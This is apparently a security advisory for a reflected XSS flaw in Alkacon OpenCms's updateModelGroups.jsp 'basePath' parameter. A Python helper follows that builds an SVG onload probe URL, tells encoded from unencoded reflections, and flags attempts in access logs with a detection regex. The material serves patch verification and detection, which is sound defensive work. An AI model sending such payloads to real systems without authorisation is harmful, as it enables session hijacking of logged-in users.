Alkacon OpenCms
cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*
- >= 9, < 10.5.1
- >= 15, < 16
A reflected cross-site scripting (XSS) vulnerability has been identified in Alkacon OpenCms versions prior to 16. The issue is in the 'updateModelGroups.jsp' page, which writes the value of the 'basePath' request parameter into its HTML response without output encoding, so an attacker-controlled string is parsed by the browser as markup and any script it contains runs in the origin of the OpenCms site.
Because the flaw is reflected, the attacker must get a user to open a crafted link to the page; the injected script then executes in that user's browser with that user's session and can issue requests to OpenCms as them. The realistic target is therefore a user who is logged in to OpenCms when they follow the link.
To reproduce this vulnerability, send a GET request to the 'updateModelGroups.jsp' page within the OpenCms application with a 'basePath' parameter whose value is a crafted payload, for example an SVG element with an 'onload' event handler. The value is echoed into the response unencoded, so the browser parses the SVG tag and runs the handler as soon as the response is rendered. A reliable check is to look at the raw response body: an affected version contains the payload verbatim, whereas a page that encodes the parameter returns it as '&lt;svg ...' and the handler does not run.
Users can update to OpenCms version 16 or later, where this vulnerability has been patched. After upgrading, confirm the fix by repeating the request above and verifying that the 'basePath' value now appears HTML-encoded in the response rather than as a live tag.
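The following Python helper, added here as an example and not part of the advisory's own proof of concept or of OpenCms, ties the reproduction step and the post-upgrade check together: it builds the probe URL with an SVG 'onload' payload in 'basePath', classifies a response body as unencoded (affected), encoded (fixed) or absent, and scans web-server access log lines for attempts against 'updateModelGroups.jsp'. The directory that contains the JSP is an assumption the tester supplies, since the advisory names only the file; the response bodies and log lines below are constructed samples, not captures from a real instance.

```python
"""Probe builder, response classifier and access-log check for the
OpenCms updateModelGroups.jsp 'basePath' reflected XSS.

Added example. Not OpenCms code and not the advisory's PoC. The path to
updateModelGroups.jsp below the OpenCms base URL is an assumption that the
tester supplies; the advisory only names the file.
"""
import html
import re
from urllib.parse import parse_qs, urlencode, urljoin, urlsplit

# Probe of the kind the advisory describes: an SVG element with an onload handler.
# The alert text is only a marker so the reflection is easy to find.
PROBE_PAYLOAD = "<svg onload=alert('basePath-probe')>"


def build_probe_url(base_url, jsp_path, payload=PROBE_PAYLOAD):
    """Return the GET URL that carries `payload` in the basePath parameter.

    `jsp_path` is the location of updateModelGroups.jsp relative to `base_url`
    (assumed known to the tester). urlencode percent-encodes the payload so the
    request line stays valid; the server decodes it before reflecting it.
    """
    target = urljoin(base_url.rstrip("/") + "/", jsp_path)
    return target + "?" + urlencode({"basePath": payload})


def classify_reflection(body, payload=PROBE_PAYLOAD):
    """Classify how the response reflects the probe.

    'unencoded': the payload appears verbatim, so the browser will parse the
                 <svg> tag and run the handler (affected version).
    'encoded':   the tag appears as '&lt;svg ...', i.e. output encoding is in
                 place and the payload is inert (fixed version).
    'absent':    the parameter is not reflected in the body at all.
    """
    if payload in body:
        return "unencoded"
    opening_tag = payload.split()[0]          # "<svg"
    if html.escape(opening_tag) in body:      # "&lt;svg"
        return "encoded"
    return "absent"


# Request line of a common/combined-format access log entry.
LOG_REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(?P<target>\S+)\s+HTTP/[\d.]+"')
# Markup or script-like content that has no business in a basePath value.
SUSPICIOUS_VALUE_RE = re.compile(r"<|javascript:|\bon\w+\s*=", re.IGNORECASE)


def find_probe_attempts(log_lines):
    """Return the log lines whose request hits updateModelGroups.jsp with a
    basePath value containing markup or an event handler, after URL decoding.
    """
    hits = []
    for line in log_lines:
        match = LOG_REQUEST_RE.search(line)
        if not match:
            continue
        parts = urlsplit(match.group("target"))
        if not parts.path.endswith("updateModelGroups.jsp"):
            continue
        params = parse_qs(parts.query, keep_blank_values=True)
        if any(SUSPICIOUS_VALUE_RE.search(v) for v in params.get("basePath", [])):
            hits.append(line)
    return hits


# Constructed sample data (not captured from a real OpenCms instance).
VULNERABLE_BODY = '<input type="hidden" name="basePath" value="' + PROBE_PAYLOAD + '">'
PATCHED_BODY = ('<input type="hidden" name="basePath" value="'
                + html.escape(PROBE_PAYLOAD, quote=True) + '">')
# The /opencms/workplace/ directory in these lines is a placeholder for the sample.
SAMPLE_LOG = [
    '198.51.100.23 - - [12/Mar/2024:09:14:02 +0000] "GET /opencms/workplace/updateModelGroups.jsp'
    '?basePath=%2Fsites%2Fdefault%2F HTTP/1.1" 200 2310',
    '203.0.113.7 - - [12/Mar/2024:09:15:41 +0000] "GET /opencms/workplace/updateModelGroups.jsp'
    '?basePath=%3Csvg%20onload%3Dalert%281%29%3E HTTP/1.1" 200 2410',
    '203.0.113.7 - - [12/Mar/2024:09:16:05 +0000] "GET /opencms/index.html'
    '?basePath=%3Csvg%20onload%3Dalert%281%29%3E HTTP/1.1" 404 310',
]

if __name__ == "__main__":
    # Hypothetical base URL and JSP location; adjust to the instance under test.
    print(build_probe_url("https://cms.example/opencms/", "workplace/updateModelGroups.jsp"))
    print("affected sample:", classify_reflection(VULNERABLE_BODY))
    print("patched sample: ", classify_reflection(PATCHED_BODY))
    for hit in find_probe_attempts(SAMPLE_LOG):
        print("probe attempt:", hit)
```

Run the generated URL against the instance (with an authenticated session if the page requires one) and feed the raw response body to classify_reflection; 'unencoded' means the reflected tag is live. The log check keys on the decoded basePath value rather than on the literal string '%3Csvg', so alternative encodings of the same payload are still flagged.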